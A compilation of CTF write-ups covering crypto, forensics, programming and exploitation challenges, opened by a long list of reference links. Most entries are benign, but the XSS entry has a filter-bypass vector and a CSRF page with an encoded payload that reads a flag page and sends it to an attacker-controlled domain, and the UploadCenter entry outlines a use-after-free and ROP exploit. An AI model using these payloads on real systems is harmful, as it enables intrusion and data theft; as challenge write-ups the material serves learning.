https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol#Request_methods[IP Address]: https://en.wikipedia.org/wiki/IP_address[IP Addresses]: https://en.wikipedia.org/wiki/IP_address[MAC Address]: https://en.wikipedia.org/wiki/MAC_address[session]: https://en.wikipedia.org/wiki/Session_%28computer_science%29[Cookie Manager+]: https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/[hexedit]: http://linux.die.net/man/1/hexedit[Google]: http://google.com/[Scapy]: http://www.secdev.org/projects/scapy/[ARP]: https://en.wikipedia.org/wiki/Address_Resolution_Protocol[UDP]: https://en.wikipedia.org/wiki/User_Datagram_Protocol[SQL injection]: https://en.wikipedia.org/wiki/SQL_injection[sqlmap]: http://sqlmap.org/[sqlite]: https://www.sqlite.org/[MD5]: https://en.wikipedia.org/wiki/MD5[OpenSSL]: https://www.openssl.org/[Burpsuite]:https://portswigger.net/burp/[Burpsuite.jar]:https://portswigger.net/burp/[Burp]:https://portswigger.net/burp/[NULL character]: https://en.wikipedia.org/wiki/Null_character[Format String Vulnerability]: http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf[printf]: http://pubs.opengroup.org/onlinepubs/009695399/functions/fprintf.html[argument]: https://en.wikipedia.org/wiki/Parameter_%28computer_programming%29[arguments]: https://en.wikipedia.org/wiki/Parameter_%28computer_programming%29[parameter]: https://en.wikipedia.org/wiki/Parameter_%28computer_programming%29[parameters]: https://en.wikipedia.org/wiki/Parameter_%28computer_programming%29[Vortex]: http://overthewire.org/wargames/vortex/[socket]: https://docs.python.org/2/library/socket.html[file descriptor]: https://en.wikipedia.org/wiki/File_descriptor[file descriptors]: https://en.wikipedia.org/wiki/File_descriptor[Forth]: https://en.wikipedia.org/wiki/Forth_%28programming_language%29[github]: https://github.com/[buffer overflow]: https://en.wikipedia.org/wiki/Buffer_overflow[try harder]: https://www.offensive-security.com/when-things-get-tough/[segmentation fault]: https://en.wikipedia.org/wiki/Segmentation_fault[seg fault]: https://en.wikipedia.org/wiki/Segmentation_fault[segfault]: https://en.wikipedia.org/wiki/Segmentation_fault[shellcode]: https://en.wikipedia.org/wiki/Shellcode[sploit-tools]: https://github.com/SaltwaterC/sploit-tools[Kali]: https://www.kali.org/[Kali Linux]: https://www.kali.org/[gdb]: https://www.gnu.org/software/gdb/[gdb tutorial]: http://www.unknownroad.com/rtfm/gdbtut/gdbtoc.html[payload]: https://en.wikipedia.org/wiki/Payload_%28computing%29[peda]: https://github.com/longld/peda[git]: https://git-scm.com/[home directory]: https://en.wikipedia.org/wiki/Home_directory[NOP slide]:https://en.wikipedia.org/wiki/NOP_slide[NOP]: https://en.wikipedia.org/wiki/NOP[examine]: https://sourceware.org/gdb/onlinedocs/gdb/Memory.html[stack pointer]: http://stackoverflow.com/questions/1395591/what-is-exactly-the-base-pointer-and-stack-pointer-to-what-do-they-point[little endian]: https://en.wikipedia.org/wiki/Endianness[big endian]: https://en.wikipedia.org/wiki/Endianness[endianness]: https://en.wikipedia.org/wiki/Endianness[pack]: https://docs.python.org/2/library/struct.html#struct.pack[ash]:https://en.wikipedia.org/wiki/Almquist_shell[dash]: https://en.wikipedia.org/wiki/Almquist_shell[shell]: https://en.wikipedia.org/wiki/Shell_%28computing%29[pwntools]: https://github.com/Gallopsled/pwntools[colorama]: https://pypi.python.org/pypi/colorama[objdump]: https://en.wikipedia.org/wiki/Objdump[UPX]: http://upx.sourceforge.net/[64-bit]: https://en.wikipedia.org/wiki/64-bit_computing[breakpoint]: https://en.wikipedia.org/wiki/Breakpoint[stack frame]: http://www.cs.umd.edu/class/sum2003/cmsc311/Notes/Mips/stack.html[format string]: http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html[format specifiers]: http://web.eecs.umich.edu/~bartlett/printf.html[format specifier]: http://web.eecs.umich.edu/~bartlett/printf.html[variable expansion]: https://www.gnu.org/software/bash/manual/html_node/Shell-Parameter-Expansion.html[base pointer]: http://stackoverflow.com/questions/1395591/what-is-exactly-the-base-pointer-and-stack-pointer-to-what-do-they-point[dmesg]: https://en.wikipedia.org/wiki/Dmesg[Android]: https://www.android.com/[.apk]:https://en.wikipedia.org/wiki/Android_application_package[decompiler]: https://en.wikipedia.org/wiki/Decompiler[decompile Java code]: http://www.javadecompilers.com/[jadx]: https://github.com/skylot/jadx[.img]: https://en.wikipedia.org/wiki/IMG_%28file_format%29[binwalk]: http://binwalk.org/[JPEG]: https://en.wikipedia.org/wiki/JPEG[JPG]: https://en.wikipedia.org/wiki/JPEG[disk image]: https://en.wikipedia.org/wiki/Disk_image[foremost]: http://foremost.sourceforge.net/[eog]: https://wiki.gnome.org/Apps/EyeOfGnome[function pointer]: https://en.wikipedia.org/wiki/Function_pointer[machine code]: https://en.wikipedia.org/wiki/Machine_code[compiled language]: https://en.wikipedia.org/wiki/Compiled_language[compiler]: https://en.wikipedia.org/wiki/Compiler[scripting language]: https://en.wikipedia.org/wiki/Scripting_language[scripts]: https://en.wikipedia.org/wiki/Scripting_language[script]: https://en.wikipedia.org/wiki/Scripting_language[shell-storm.org]: http://shell-storm.org/[shell-storm]:http://shell-storm.org/[shellcode database]: http://shell-storm.org/shellcode/[gdb-peda]: https://github.com/longld/peda[x86]: https://en.wikipedia.org/wiki/X86[Intel x86]: https://en.wikipedia.org/wiki/X86[sh]: https://en.wikipedia.org/wiki/Bourne_shell[/bin/sh]: https://en.wikipedia.org/wiki/Bourne_shell[SANS]: https://www.sans.org/[Holiday Hack Challenge]: https://holidayhackchallenge.com/[USCGA]: http://uscga.edu/[United States Coast Guard Academy]: http://uscga.edu/[US Coast Guard Academy]: http://uscga.edu/[Academy]: http://uscga.edu/[Coast Guard Academy]: http://uscga.edu/[Hackfest]: https://www.sans.org/event/pen-test-hackfest-2015[SSID]: https://en.wikipedia.org/wiki/Service_set_%28802.11_network%29[DNS]: https://en.wikipedia.org/wiki/Domain_Name_System[Python:base64]: https://docs.python.org/2/library/base64.html[OpenWRT]: https://openwrt.org/[node.js]: https://nodejs.org/en/[MongoDB]: https://www.mongodb.org/[Mongo]: https://www.mongodb.org/[SuperGnome 01]: http://52.2.229.189/[Shodan]: https://www.shodan.io/[SuperGnome 02]: http://52.34.3.80/[SuperGnome 03]: http://52.64.191.71/[SuperGnome 04]: http://52.192.152.132/[SuperGnome 05]: http://54.233.105.81/[Local file inclusion]: http://hakipedia.com/index.php/Local_File_Inclusion[LFI]: http://hakipedia.com/index.php/Local_File_Inclusion[PNG]: http://www.libpng.org/pub/png/[.png]: http://www.libpng.org/pub/png/[Remote Code Execution]: https://en.wikipedia.org/wiki/Arbitrary_code_execution[RCE]: https://en.wikipedia.org/wiki/Arbitrary_code_execution[GNU]: https://www.gnu.org/[regular expression]: https://en.wikipedia.org/wiki/Regular_expression[regular expressions]: https://en.wikipedia.org/wiki/Regular_expression[uniq]: https://en.wikipedia.org/wiki/Uniq[sort]: https://en.wikipedia.org/wiki/Sort_%28Unix%29[binary data]: https://en.wikipedia.org/wiki/Binary_data[binary]: https://en.wikipedia.org/wiki/Binary[automation is divine]: https://www.youtube.com/watch?v=36AA3JGRP9s[repos]:https://help.ubuntu.com/community/Repositories/Ubuntu[repo]:https://help.ubuntu.com/community/Repositories/Ubuntu[repository]:https://help.ubuntu.com/community/Repositories/Ubuntu[repositories]: https://help.ubuntu.com/community/Repositories/Ubuntu[hex dump]: https://en.wikipedia.org/wiki/Hex_dump[hexdump]: https://en.wikipedia.org/wiki/Hex_dump[xxd]: http://linuxcommand.org/man_pages/xxd1.html[mkdir]: https://en.wikipedia.org/wiki/Mkdir[file]: https://en.wikipedia.org/wiki/File_%28command%29[gzip]: http://www.gzip.org/[file extension]: https://en.wikipedia.org/wiki/Filename_extension[bzip]: http://www.bzip.org/[bzip2]: http://www.bzip.org/[tar]: https://en.wikipedia.org/wiki/Tar_%28computing%29[tar command]: http://linuxcommand.org/man_pages/tar1.html[private key]: https://help.ubuntu.com/community/SSH/OpenSSH/Keys[s_client]: https://www.openssl.org/docs/manmaster/apps/s_client.html[nmap]: https://nmap.org/[IP address]: https://en.wikipedia.org/wiki/IP_address[RSA]: https://en.wikipedia.org/wiki/RSA_(cryptosystem)[ssh private key]: https://help.ubuntu.com/community/SSH/OpenSSH/Keys[file permissions]: https://www.linux.com/learn/understanding-linux-file-permissions[octal file permission]: http://www.cyberciti.biz/faq/how-linux-file-permissions-work/[octal file permissions]: http://www.cyberciti.biz/faq/how-linux-file-permissions-work/[chmod]: https://en.wikipedia.org/wiki/Chmod[diff]: http://man7.org/linux/man-pages/man1/diff.1.html[.bashrc]: http://unix.stackexchange.com/questions/129143/what-is-the-purpose-of-bashrc-and-how-does-it-work[bashrc]: http://unix.stackexchange.com/questions/129143/what-is-the-purpose-of-bashrc-and-how-does-it-work[setuid]: https://en.wikipedia.org/wiki/Setuid[user id]: https://en.wikipedia.org/wiki/User_identifier[effective user id]: https://en.wikipedia.org/wiki/User_identifier#Effective_user_ID[cron]: https://en.wikipedia.org/wiki/Cron[file extension]: https://en.wikipedia.org/wiki/Filename_extension[file extensions]: https://en.wikipedia.org/wiki/Filename_extension[bash script]: https://linuxconfig.org/bash-scripting-tutorial[bash script]: https://linuxconfig.org/bash-scripting-tutorial[bash scripts]: https://linuxconfig.org/bash-scripting-tutorial[shebang line]: https://en.wikipedia.org/wiki/Shebang_(Unix)[she-bang line]: https://en.wikipedia.org/wiki/Shebang_(Unix)[sha-bang line]: https://en.wikipedia.org/wiki/Shebang_(Unix)[shabang line]: https://en.wikipedia.org/wiki/Shebang_(Unix)[sha bang line]: https://en.wikipedia.org/wiki/Shebang_(Unix)[nano]: https://en.wikipedia.org/wiki/GNU_nano[text editor]: https://en.wikipedia.org/wiki/Text_editor[whoami]: https://en.wikipedia.org/wiki/Whoami[echo]: https://en.wikipedia.org/wiki/Echo_(command)[md5sum]: http://www.tutorialspoint.com/unix_commands/md5sum.htm[checksum]: https://en.wikipedia.org/wiki/Checksum[hash]: https://en.wikipedia.org/wiki/Cryptographic_hash_function[cut]: https://en.wikipedia.org/wiki/Cut_(Unix)[daemon]: https://en.wikipedia.org/wiki/Daemon_(computing)[temporary directory]: https://en.wikipedia.org/wiki/Temporary_folder[temp directory]: https://en.wikipedia.org/wiki/Temporary_folder[temp folder]: https://en.wikipedia.org/wiki/Temporary_folder[temporary folder]: https://en.wikipedia.org/wiki/Temporary_folder[seq]: http://www.cyberciti.biz/tips/tag/seq-command[/etc/passwd]: https://en.wikipedia.org/wiki/Passwd#Password_file[more]: https://en.wikipedia.org/wiki/More_(command)[vi]: https://en.wikipedia.org/wiki/Vi[vim]: http://www.vim.org/[caesar cipher]: https://en.wikipedia.org/wiki/Caesar_cipher[vignere cipher]: https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher[substitution cipher]: https://en.wikipedia.org/wiki/Substitution_cipher[DNA]: https://en.wikipedia.org/wiki/Nucleic_acid_sequence[Python bytecode]: http://security.coverity.com/blog/2014/Nov/understanding-python-bytecode.html[uncompyle]: https://github.com/gstarnberger/uncompyle[Easy Python Decompiler]: https://github.com/aliansi/Easy-Python-Decompiler-v1.3.2[marshal]: https://docs.python.org/2/library/marshal.html[IDLE]: https://en.wikipedia.org/wiki/IDLE[bytecode]: http://whatis.techtarget.com/definition/bytecode[dis]: https://docs.python.org/2/library/dis.html[rot13]: https://en.wikipedia.org/wiki/ROT13[calendar]: https://docs.python.org/2/library/calendar.html[datetime]: https://docs.python.org/2/library/datetime.html[primefac]: https://pypi.python.org/pypi/primefac[re]: https://docs.python.org/2/library/re.html[IDA pro]: https://www.hex-rays.com/products/ida/[IDA]: https://www.hex-rays.com/products/ida/[QR Code]: https://en.wikipedia.org/wiki/QR_code[RGB]: https://en.wikipedia.org/wiki/RGB_color_model[RGB color]: https://en.wikipedia.org/wiki/RGB_color_model[exiftool]: http://www.sno.phy.queensu.ca/~phil/exiftool/[robots.txt]: http://www.robotstxt.org/[XSS]: https://en.wikipedia.org/wiki/Cross-site_scripting[cross-site scripting]: https://en.wikipedia.org/wiki/Cross-site_scripting[cross site scripting]: https://en.wikipedia.org/wiki/Cross-site_scripting[cookie catcher]: http://hackwithstyle.blogspot.com/2011/11/what-is-cookie-catcher-and-how-to-get.html[johnhammond.org]: http://johnhammond.org[HTTP cookie]: https://en.wikipedia.org/wiki/HTTP_cookie[HTTP cookies]: https://en.wikipedia.org/wiki/HTTP_cookie[cookie]: https://en.wikipedia.org/wiki/HTTP_cookie[cookies]: https://en.wikipedia.org/wiki/HTTP_cookie[HTTP GET]: http://www.w3schools.com/Tags/ref_httpmethods.asp[tee]: https://en.wikipedia.org/wiki/Tee_(command)[reverse engineering]: https://en.wikipedia.org/wiki/Reverse_engineering[cryptography]: https://en.wikipedia.org/wiki/Cryptography[crypto]: https://en.wikipedia.org/wiki/Cryptography[sed]: https://en.wikipedia.org/wiki/Sed[padding]: https://en.wikipedia.org/wiki/Padding_(cryptography)[xortool]: https://github.com/hellman/xortool[XOR Cracker]: https://wiremask.eu/tools/xor-cracker/
<span>Reversing 50 - Gifted</span><span>Description</span>No Description<span>Solution</span><span>The flag appears in the output of strings gifted</span><span>Flag</span><span>AlexCTF{Y0u_h4v3_45t0n15h1ng_futur3_1n_r3v3r5ing}</span>
# Vibranium Circuit ChallengeProgramming 400 > Access the server in 54.175.35.248:8003 EN: Cycles are forbidden. In the task description we were only given an IP address to the server and a note that circles are not allowed. To find out what this task was about, we needed to connect to the server. I made a netcat connection to the given IP address and received a bit more information on what we were supposed to do. The info included the following: > [+] To save material, we need you to tell us the minimum number of movements required to build this circuit. > [+] The print starts from the given point, must run the entire circuit and return to the starting point. > [+] Example: +-+ +-+ +-+ start +---> |1| |2| |3| +++ +-+ +++ | | | | +++ +-+ +++ |4+----+5+----+6| +++ +++ +++ | | | | | | +++ +++ +++ |7| |8| |9| +-+ +-+ +-+ > [+] To solve this example, we will give to you, the number of nodes (9), the number of connections with the start point (7 + 1) and the start point (position 1). > [+] This is the format of the input diagram to the example: [(1, 1), (1, 4), (4, 5), (4, 7), (5, 8), (5, 6), (6, 9), (6, 3)] > [+] The answer to the example is 14 So, the first tuple in the connections list represents the starting point, in the example that's (1, 1). From there onwards we had to visit all the nodes, and then return to the starting node without traveling in circles. Because circles were not allowed, the circuit could be presented as a tree structure, and it could be traveled recursively. I used [NetworkX](https://networkx.github.io/) for graph related functions and came up with the following script to solve the task: ``` pythonimport networkx as nximport ast def travel_graph(graph, current_node, visited_nodes): found = 0 visited_nodes.append(current_node) for neighbor in graph.neighbors(current_node): if neighbor not in visited_nodes: found += travel_graph(graph, neighbor, visited_nodes) + 2 return found def get_shortest_path(nodes, connections): edges = ast.literal_eval(connections.strip()) node_range = range(1, nodes + 1) G = nx.Graph() G.add_nodes_from(node_range) # Add nodes G.add_edges_from(edges) # Add edges result = travel_graph(G, edges[0][0], []) return result``` The other part of the task was to create code to interract with the server. The server printed information in the following way: > [+] To start the challenge inform the number 86: 86 OK, let's go! > [+] Stage 1 Number of nodes: 9 Connections: [(7, 7), (7, 4), (4, 1), (1, 4), (4, 5), (5, 2)] The minimum is: I used the following script to interract with the server:``` pythonfrom pwn import *r = remote('54.175.35.248', 8003) # nc 54.175.35.248 8003print r.recvuntil('To start the challenge inform the number '), line = r.recv(3)print line if ':' not in line: print r.recv()else: line = line.replace(':', '')print liner.send(line.replace(' ', '') + '\n') while True: try: l = r.recvuntil('Stage') print l , l = r.recvuntil('Number of nodes: ') nodes = r.recvline() print l, nodes, l = r.recvuntil('Connections: ') connections = r.recvline() print l, connections, l = r.recvuntil('The minimum is: ') path_len = get_shortest_path(int(nodes), connections) print l, path_len, r.send(str(path_len) + '\n') line = r.recvline() if 'Wrong!' in line: print line print r.recvall() break except: print r.recvall() breakr.close()``` After 100 rounds we were given the flag. The flag was: 3DS{m4st3r_0f_Th3_l4byrInth}
# Black Is The New Rose There were two hints in this challenge. One on the website (something like "look for the black") and second at the end of the file ("seems like you are still a noobie at bash .. Have a closer look !! ... :D ..."). First I've taken a look at the picture looking for black. I found out, there are lines of black in the middle of the image. So I've decided to make a script to analyze them. The script sets the number of black pixels initially to 0. Then it does the iteration over all pixels in the image and increments result $res[$yy] if it detects black (RGB 0,0,0). Those are the first 2 nested for cycles. In the result $res are many zeros and a few numbers between 2 and 15, so it could be hex numbers. Next iteration over result $res puts non-zero numbers to the new array $fus. Next iteration over array $fus makes those numbers hex, producing new array $haa. Last iteration over array $haa outputs couples of hex to browser (I used XAMPP on Windows for that). It produces this: {ziv_gslhv_klgziz_vziirmth?} It looks very much like the flag but is not accepted, so here comes the team work finding the right cipher. We found out it's Atbash cipher and the resulting flag is {are_those_potara_earrings?} Done. Thank you Blackfisk for finding out it's Atbash cipher. mooph
I was not able to solve it in the remaining time during the CTF. Found this, (obviously not mine):https://github.com/cstanfill/accounting-writeup Original writeup. Contains the original source for the problem.<span>It was initially a bit hard to understand, so rewrote it in order to better understand it and step through the code. </span><span>I posted it here: https://github.com/Caesurus/bkp2017_accounting_simulator/blob/master/exploit.py</span>
**Crypto - OTPunched - 50pts** ![Alt](img/card1.png "Punched Card 1") ![Alt](img/card2.png "Punched Card 2") Nous avions à disposition deux cartes perforés de chez IBM. Pour récupérer les données contenu de dans , nous les avons uploader sur ce site : http://www.masswerk.at/cardreader/ On obtient deux chaines en hexa : Carte 1 = 365C997610306888C3CB07B26C7ED39325E4AD1BDC87255B8F5E54B66E253759B306A9BAA01B7D4A Carte 2 = 5A04DC351E3D7B9CC3CE1DFF5142B08B3AFCA60B9484336B961F54A67319304E8845ABA9B60C734A L'OTP du titre nous fait penser à un masque jetable. Celui-ci aurait été utilisé pour chiffré les deux plaintext. https://github.com/SpiderLabs/cribdrag Nous utilisons le script xorstrings.py de l'outil cribdrag pour xorer les deux chaines. ```BASH./xorstrings.py 365C997610306888C3CB07B26C7ED39325E4AD1BDC87255B8F5E54B66E253759B306A9BAA01B7D4A 5A04DC351E3D7B9CC3CE1DFF5142B08B3AFCA60B9484336B961F54A67319304E8845ABA9B60C734A => 6c5845430e0d131400051a4d3d3c63181f180b1048031630194100101d3c07173b43021316170e00``` Nous utilisons ensuite la technique du crib sur cette chaine. ```BASH ./cribdrag.py 6c5845430e0d131400051a4d3d3c63181f180b1048031630194100101d3c07173b43021316170e00 Your message is currently:0 ________________________________________Your key is currently:0 ________________________________________Please enter your crib: punched cards0: "?-+ fhw4cdh)N"1: "(0-mevp f{?YO"2: "56`n{qd%y,OX?"3: "3{cp|ea:.\Nk"...26: "pes_or_cards}"27: "`hRd^'"pwejs"Enter the correct position, 'none' for no match, or 'end' to quit: 26 Is this crib part of the message or key? Please enter 'message' or 'key': messageYour message is currently:0 __________________________punched cards_Your key is currently:0 __________________________pes_or_cards}_ ``` On continu ainsi en testant des mots potentiel jusqu'à obtenir le flag. thcon{punched_tapes_or_cards} By team Beers4Flags ``` ________| || #BFF ||________| _.._,_|,_ ( | ) ]~,"-.-~~[ .=] Beers ([ | ]) 4 ([ '=]) Flags [ |:: ' | ~~----~~```
**Crypto - brokenhash - 100pts** Le challenge était sur un site web.Celui-ci nous proposait d'uploader deux fichiers. Nous créons deux fichiers vide : ```BASHtouch t.txttouch t2.txt``` Le site nous redirige sur une page contenant l'information suivante : ```BASHif sha1[0] == sha1[1] and md5[0] != md5[1]: get flag # ;)``` Nous avons donc ici une collision sha 1 qui colle pafaitement avec l'actualité du moment. Notre premier essaye à été d'uploader les deux pdf fournit dans les recherches de collision SHA1 de Google. Ils ont la particularité d'avoir la même somme sha1. [Fichier 1 : Collision SHA1 par google ](../100/file/shattered-1.pdf) [Fichier 2 : Collision SHA1 par google ](../100/file/shattered-1.pdf) Retour du site de challenge => Too Easy. Nous avons utilisé ce site https://alf.nu/SHA1 pour construire notre collision. Les prérequis sont deux jpg < 64Ko ![Alt](img/right.jpg "Image 1") ![Alt](img/top.jpg "Image 2") Le site nous renvoie deux pdf : [Fichier 1 : Collision SHA1 par Beers4Flags ](../100/file/a.pdf) [Fichier 2 : Collision SHA1 par Beers4Flags ](../100/file/b.pdf) Nous verifions que nos deux pdf ont bien la même somme SHA1 ```BASHsha1sum a.pdf 9895a12be3429d4ca69835aad36527664ed952e5 a.pdf sha1sum b.pdf9895a12be3429d4ca69835aad36527664ed952e5 b.pdf ``` Nous les uplodons sur le site et flag ! THCon{ST0P_US1nG_Th0S3_l4m3_H4SH_FuNCTIONz} By team Beers4Flags ``` ________| || #BFF ||________| _.._,_|,_ ( | ) ]~,"-.-~~[ .=] Beers ([ | ]) 4 ([ '=]) Flags [ |:: ' | ~~----~~```
# EasyCTF - RSA 2 In this challenge, we are asked to decipher an RSA encoded message.We are given N, e and C. N looks quite small, so there is a chance it has already been factored online.Using https://factordb.com, we find that `N = 338779901332693957541 * 381858611614052422763`. There goes the rest of the challenge: ```python#!/usr/bin/python import gmpy2 p = 338779901332693957541q = 381858611614052422763e = 0x10001c = 41786000149048295568588665335025364614298 phi = (p-1)*(q-1)d = gmpy2.invert(e, phi)m = pow(c, d, p*q) print hex(m)[2:].replace('L','').decode('hex')``` The result is `flag{l0w_n_0868}`.
正在觀察網頁並開啟DevTools,你會發現 movie.gif正在快速的閃爍,並且間隔之間的黑白有些微的偏差,所以我們試著轉換成0和1“ ```from PIL import Image im = Image.open(`'`movie.gif') w, h = im.size res = ' ' try: while True: i = im.convert('RGB') res += '0' if i.getpixel((0, 0)) == (0, 0, 0) else '1' im.seek(im.tell() + 1) except: print(res)``` ”得到結果 result.txt並run以下腳本“```s = open('result.txt').read().strip()s =`` s.replace('00000', ' ') s = s.replace('0000', '-') s = s.replace('000', '.') s = s.replace('1', '') print(s)``` ”得到摩斯密碼並解密:HACKCONMORSEFLAG
Challenge: RSA 2 ----------------------------------------Category: Cryptography ----------------------------------------80 points ---------------------------------------- ```Description: Written by neptuniaSome more RSA! This time, there's no P and Q... this. Hint: It's like RSA 1 but harder. Have fun! File = ciphertest2.txt n: 266965481915457805187702917726550329693157e: 65537c: 78670065603555615007383828728708393504251``` ```python#!/usr/bin/env pythonimport libnum """C:\Users\Ne0Lux-C1Ph3r\Downloads\yafu-1.34>yafu-Win32.exe factor(266965481915457805187702917726550329693157) fac: factoring 266965481915457805187702917726550329693157fac: using pretesting plan: normalfac: no tune info: using qs/gnfs crossover of 95 digitsdiv: primes less than 10000rho: x^2 + 3, starting 1000 iterations on C42rho: x^2 + 2, starting 1000 iterations on C42rho: x^2 + 1, starting 1000 iterations on C42pm1: starting B1 = 150K, B2 = gmp-ecm default on C42ecm: 30/30 curves on C42, B1=2K, B2=gmp-ecm default starting SIQS on c42: 266965481915457805187702917726550329693157 ==== sieving in progress (1 thread): 848 relations needed ======== Press ctrl-c to abort and save state ====702 rels found: 420 full + 282 from 2810 partial, (11777.70 rels/sec) SIQS elapsed time = 0.3393 seconds.Total factoring time = 0.9532 seconds ***factors found*** P21 = 458070420083487550883P21 = 582804455845022449879 ans = 1""" n = 266965481915457805187702917726550329693157p = 458070420083487550883q = 582804455845022449879e = 65537c = 78670065603555615007383828728708393504251 n=p*qphi=(p-1)*(q-1)d = libnum.modular.invmod(e, phi)print libnum.n2s(pow(c, d, n)) #flag{l0w_n_0eb6}```
# UploadCenter Author: meh@Hitcon ### Description ```There's an upload server here.Upload whatever you want.nc 202.120.7.216 12345 binary```The main functions:```1 :) Fill your information2 :) Upload and parse File3 :) Show File info4 :) Delete File5 :) Commit task6 :) Monitor File```We can use **upload** function to upload a PNG image which is compressed with zlib, or delete it. **commit** will create a thread and show the info of uploaded files. **monitor** will create a thread a thread to notify when a PNG is uploaded. I directly took a PNG generator made by my teammate Jeffxx which was used in codegate qual. ;) ### Vulnerability The upload function is something like this:```c//...readn(&size, 4);infstream.avail_in = size;infstream.next_in = g_inputBuffer;infstream.avail_out = g_BufferLength;infstream.next_out = g_outputBuffer;inflate(&infstream, 0);length = g_BufferLength - infstream.avail_out;//...img = mmap(0, width*height, 3, 34, -1, 0);pngobj = calloc(1, 0x30);pngobj->content = img;pngobj->length = length;//...```But the delete function does: ```cmunmap(pngobj->content, pngobj->length);```We can see that the size of mmap is **width*height** and munmap is **png length**. Apparently the size of **mmap** and **munmap** is mismatched. ### Exploit * mmap a png upon outputBuffer I realized what this challenge want immediately. Because **pthread** uses mmap to prepare stack for threads, and we can use this uaf vul to overwrite the return address of thread. mmap pages usually located the tls section if the gap is big enough, otherwise it will find other gap above which is available. But the gap upon tls is not big enough for a thread stack (generally 0x800000 with a protect page), if we put our png there it would be hard to exploit. As a result, we first upload a pretty big PNG to make the mmap page upon outputBuffer (mmapped when the program start, it is bigger than the gap above tls so is located upon library pages). Make memory layout like: ``` +------------------+ | binary | |------------------| | // big gap // | |------------------| | png | |------------------| <- g_outputBuffer | |       |  outputBuffer | |------------------| | libs | | & ld | | & gaps | | & tls | |------------------| | stack | |------------------| | | +------------------+```* munmap the png Then we can munmap the png with a larger size, so that part of output Buffer will be unmapped too. ``` +------------------+ | binary | |------------------| | // big gap // | | | |------------------| <- g_outputBuffer |#### unmapped ####|       |  outputBuffer | |------------------| | libs | | & ld | | & gaps | | & tls | |------------------| | stack | |------------------| | | +------------------+```* Create a thread After that, we create a thread for monitor. ``` +------------------+ | binary | |------------------| | // big gap // | |------------------| | thread stack | | | <- g_outputBuffer |------------------|       |  outputBuffer | |------------------| | libs | | & ld | | & gaps | | & tls | |------------------| | stack | |------------------| | | +------------------+``` * Upload PNG and overwrite return address to ROP Now the outputBuffer and the stack is partially **overlapped** (The pointer points to somewhere inside the bottom of thread stack). So we can overwrite return address by uploading a PNG, then do ROP to leak libc and stack migration to ROP again. Something need to be noticed is that when two threads are both reading a same fd, the input will be receive by one thread **not in order**. It only depends on which thread is served at that time. (just my observation, not very sure) After observing remote server, we found that the main thread is always the first, so we sent a newline before payload to solve this problem.
Challenge: Fizz Buzz----------------------------------------Category: Programming----------------------------------------50 points ---------------------------------------- ```Description: Written by wiresboy Write a program that takes an integer n as input.Output the numbers 1 through n, in increasing order, one per line.However, replace any line that is a multiple of 3 with Fizz and any that are a multiple of 5 with Buzz. Any line that is a multiple of 3 and 5 should be written as FizzBuzz.The input will be the number of lines to write, n, followed by a linebreak. Sample input: 17 Sample output: 12Fizz4BuzzFizz78FizzBuzz11Fizz1314FizzBuzz1617 no Hint!!!!``` ```python#!/usr/bin/env python n = int(input('')) for x in xrange(1, n+1): fizz = not x % 3 buzz = not x % 5 if fizz and buzz : print "FizzBuzz" elif fizz: print "Fizz" elif buzz: print "Buzz" else: print x```
Challenge: My USB----------------------------------------Category: Forensics----------------------------------------150 points ---------------------------------------- ```Description: Written by neptunia I found my usb from a long time ago. I know there's a flag on there somewhere; can you help me find it?Hint: Sorry, no hint. File = usb.img```A small blow of Foremost!!!!!
This task is XSS filter with allowed characters : ```a-zA-Z ~|_^\=<-+*``` For attack we use this DOM-based vector: ```<svg id=\ onload=location=id+id+12345609861+domain+id+1234+id``` It will redirect to our controlled domain https://12345609861router.vip/1234/($12.95 + Let’s Encrypt) It has index.html with csrf in this directory.```<html> <body> <form id="send" action="https://router.vip/preview.php?" method="POST"> <input type="hidden" name="task" value="" /> <input type="hidden" name="payload" value="<svg onload=location=name" /> <input type="hidden" name="geetest_challenge" value="" /> <input type="hidden" name="geetest_validate" value="" /> <input type="hidden" name="geetest_seccode" value="" /> <input type="submit" value="Submit request" /> </form> <script> window.name = "javascript:%76%61%72%20%78%68%72%20%3d%20%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%0a%78%68%72%2e%6f%70%65%6e%28%27%47%45%54%27%2c%20%27%68%74%74%70%73%3a%2f%2f%72%6f%75%74%65%72%2e%76%69%70%2f%66%6c%61%67%2e%70%68%70%27%2c%20%66%61%6c%73%65%29%3b%0a%78%68%72%2e%73%65%6e%64%28%29%3b%0a%69%66%20%28%78%68%72%2e%73%74%61%74%75%73%20%3d%3d%20%32%30%30%29%20%7b%0a%20%20%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%73%3a%2f%2f%31%32%33%34%35%36%30%39%38%36%31%72%6f%75%74%65%72%2e%76%69%70%2f%31%32%33%34%2f%3f%72%65%73%75%6c%74%3d%27%2b%78%68%72%2e%72%65%73%70%6f%6e%73%65%54%65%78%74%3b%0a%7d"; document.getElementById("send").submit(); </script> </body></html>``` This vector set window.name with javascript:XSS payload and POST request on preview with ```
Challenge: QR 1----------------------------------------Category: Forensics----------------------------------------100 points ---------------------------------------- ```Description: Written by wiresboy I just saw this QR code the other day, but couldn't tell what data it has. Can you help? Here it is. Hint: Is the image only black and white? File= qr1.bmp ```
